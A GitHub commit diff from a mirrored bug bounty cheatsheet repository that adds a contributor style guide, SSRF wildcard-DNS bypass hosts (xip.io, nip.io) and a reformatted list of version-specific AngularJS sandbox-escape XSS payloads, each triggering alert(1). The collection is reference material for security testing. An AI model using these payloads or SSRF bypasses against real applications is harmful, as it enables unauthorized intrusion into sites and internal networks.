Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-25 12:30:19 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #2 from EdOverflow/master

Browse source 
Syncing
This commit is contained in:
Evgeniy Yakovchuk 2017-07-17 17:44:08 +03:00 committed by GitHub
commit a20e51a3ff
4 changed files with 77 additions and 16 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
README.md
View file

@ -28,6 +28,16 @@ Our bug tracker utilizes several labels to help organize and identify issues.
Use the GitHub issue search — check if the issue has already been reported. Use the GitHub issue search — check if the issue has already been reported.
# Style Guide
We like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)
- Cheat sheet titles should start with `##`.
- Subheadings should be made bold. (`**Subheading**`)
- Add newlines after subheadings and code blocks.
- Code blocks should use three backticks. (```)
- Make sure to use syntax highlighting whenever possible.
# Contributors # Contributors
- [EdOverflow](https://github.com/EdOverflow) - [EdOverflow](https://github.com/EdOverflow)

1
cheatsheets/open-redirect.md
View file

@ -7,6 +7,7 @@
``` ```
/%5cgoogle.com /%5cgoogle.com
``` ```
``` ```
//www.google.com/%2f%2e%2e //www.google.com/%2f%2e%2e
``` ```

20
cheatsheets/ssrf.md
View file

@ -29,3 +29,23 @@ http://[::1]
``` ```
http://[::] http://[::]
``` ```
**Wildcard DNS**
```
10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io
```
_Link:_ http://xip.io
```
10.0.0.1.nip.io maps
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io
```
_Link:_ http://nip.io

60
cheatsheets/xss.md
View file

@ -62,33 +62,46 @@ javas	cript://www.google.com/%0Aalert(1)
[a](javascript://www.google.com%0Aprompt(1)) [a](javascript://www.google.com%0Aprompt(1))
``` ```
## AngularJS Template Injection based XSS **AngularJS Template Injection based XSS**
**1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F) **1.0.1 - 1.1.5** by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
```
```js
{{constructor.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}}
``` ```
**1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.2.0 - 1.2.1** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}} {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
``` ```
**1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.2.2 - 1.2.5** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}} {{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
``` ```
**1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.2.6 - 1.2.18** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
``` ```
**1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn) **1.2.19 - 1.2.23** by [Mathias Karlsson](https://twitter.com/avlidienbrunn)
```
```js
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
``` ```
**1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.2.24 - 1.2.29** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
``` ```
**1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g) **1.3.0** by [Gábor Molnár (Google)](https://twitter.com/molnar_g)
``` ```
{{!ready && (ready = true) && ( {{!ready && (ready = true) && (
!call !call
@ -105,42 +118,57 @@ javas	cript://www.google.com/%0Aalert(1)
)) ))
);}} );}}
``` ```
**1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.1 - 1.3.2** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{ {{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf; 'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//'); $eval('x=alert(1)//');
}} }}
``` ```
**1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.3 - 1.3.18** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join; 'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }} $eval('x=alert(1)//'); }}
``` ```
**1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.19** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{ {{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//'); $eval('x=alert(1)//');
}} }}
``` ```
**1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.3.20** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
``` ```
**1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes) **1.4.0 - 1.4.9** by [Gareth Heyes (PortSwigger)](https://twitter.com/garethheyes)
```
```js
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
``` ```
**1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024) **1.5.0 - 1.5.8** by [Ian Hickey](https://twitter.com/ianhickey1024)
```
```js
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
``` ```
**1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh) **1.5.9 - 1.5.11** by [Jan Horn (Google)](https://twitter.com/tehjh)
```
```js
{{ {{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase; c.$apply=$apply;c.$eval=b;op=$root.$$phase;
@ -156,7 +184,9 @@ javas	cript://www.google.com/%0Aalert(1)
$eval('a(b.c)');[].push.apply=a; $eval('a(b.c)');[].push.apply=a;
}} }}
``` ```
**1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F) **1.6.0+** (no Sandbox) by [Mario Heiderich (Cure53)](https://twitter.com/0x6D6172696F)
```
```js
{{constructor.constructor('alert(1)')()}} {{constructor.constructor('alert(1)')()}}
``` ```